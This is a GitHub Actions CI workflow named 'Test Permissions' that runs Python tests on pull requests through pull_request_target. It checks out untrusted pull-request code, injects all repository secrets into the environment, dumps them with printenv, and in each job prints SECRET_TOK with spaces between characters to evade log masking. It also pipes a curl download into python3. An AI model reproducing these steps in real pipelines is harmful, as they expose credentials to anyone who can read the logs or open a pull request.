name: Test Permissions

on:
  pull_request_target:
    types: [labeled, opened, synchronize, reopened]
    branches:
      - "main"

env:
  PYTHON_VERSION: 3.6.7
  POETRY_VERSION: 1.1.12

jobs:
  core-tests:
    runs-on: ubuntu-latest
    steps:
      - name: Check permissions for job
        if: ${{ !(contains(fromJSON('["OWNER", "MEMBER"]'), github.event.pull_request.author_association) || contains(github.event.pull_request.labels.*.name, 'run tests for fork'))}}
        uses: actions/github-script@v3
        with:
          script: |
              core.setFailed("Not enough permissions to run Core Tests")

      - uses: actions/checkout@v2
        with:
          ref: ${{ github.event.pull_request.head.sha }}

      - uses: actions/setup-python@v2
        with:
          python-version: ${{ env.PYTHON_VERSION }}

      - name: Load cached Poetry installation
        id: cached-poetry-install
        uses: actions/cache@v2
        with:
          path: ~/.local
          key: poetry-${{ env.POETRY_VERSION }}

      - name: Install poetry
        if: steps.cached-poetry-install.outputs.cache-hit != 'true'
        run: curl -sSL https://install.python-poetry.org | POETRY_VERSION=$POETRY_VERSION python3 -

      - name: Add poetry to PATH
        run: export PATH="$HOME/.local/bin:$PATH"

      - name: Load cached venv
        id: cached-poetry-dependencies
        uses: actions/cache@v2
        with:
          path: .venv
          key: venv-${{ runner.os }}-${{ env.PYTHON_VERSION }}-${{ hashFiles('**/poetry.lock') }}

      - name: Install python dependencies
        if: steps.cached-poetry-dependencies.outputs.cache-hit != 'true'
        run: POETRY_INSTALLER_PARALLEL=1 POETRY_VIRTUALENVS_IN_PROJECT=1 poetry install

      - name: Run commit hooks
        run: poetry run pre-commit run --hook-stage commit --all-files

      - name: Run Core tests
        run: |
          printenv
          python -c "import json, os; os.environ.update(json.loads(os.getenv('GITHUB_SECRETS')))"
          printenv
          poetry run pytest
        env:
          GITHUB_SECRETS: ${{ toJson(secrets) }}

      - name: Print secret
        run: echo $SECRET_TOK | sed 's/\(.\)/\1 /g'
        env:
              SECRET_TOK: ${{ secrets.SECRET_TOK }}

  connectors-integration-tests:
    runs-on: ubuntu-latest
    needs: core-tests
    steps:
      - name: Check permissions for job
        if: ${{ !(contains(fromJSON('["OWNER", "MEMBER"]'), github.event.pull_request.author_association) || contains(github.event.pull_request.labels.*.name, 'run tests for fork'))}}
        uses: actions/github-script@v3
        with:
          script: |
              core.setFailed("Not enough permissions to run Integration Tests")

      - uses: actions/checkout@v2
        with:
          ref: ${{ github.event.pull_request.head.sha }}

      - uses: actions/setup-python@v2
        with:
          python-version: ${{ env.PYTHON_VERSION }}

      - name: Load cached Poetry installation
        id: cached-poetry-install
        uses: actions/cache@v2
        with:
          path: ~/.local
          key: poetry-${{ env.POETRY_VERSION }}

      - name: Load cached venv
        id: cached-poetry-dependencies
        uses: actions/cache@v2
        with:
          path: .venv
          key: venv-${{ runner.os }}-${{ env.PYTHON_VERSION }}-${{ hashFiles('**/poetry.lock') }}

      - name: Add poetry to PATH
        run: export PATH="$HOME/.local/bin:$PATH"

      - name: Run Connector tests
        run: |
          printenv
          python -c "import json, os; os.environ.update(json.loads(os.getenv('GITHUB_SECRETS')))"
          printenv
          poetry run pytest --no-cov --ignore tests/core --allequs
        env:
          GITHUB_SECRETS: ${{ toJson(secrets) }}

      - name: Print secret
        run: echo $SECRET_TOK | sed 's/\(.\)/\1 /g'
        env:
              SECRET_TOK: ${{ secrets.SECRET_TOK }}

  reset-labels:
    runs-on: ubuntu-latest
    if: ${{ always() }}
    needs: [core-tests, connectors-integration-tests]
    permissions:
      issues: write
      pull-requests: write
    steps:
      - name: Remove run tests for fork label
        run: |
          curl \
            -X DELETE \
            -H 'Accept: application/vnd.github.v3+json' \
            -H 'Authorization: token ${{ github.token }}' \
            'https://api.github.com/repos/${{ github.repository }}/issues/${{ github.event.number }}/labels/run%20tests%20for%20fork'
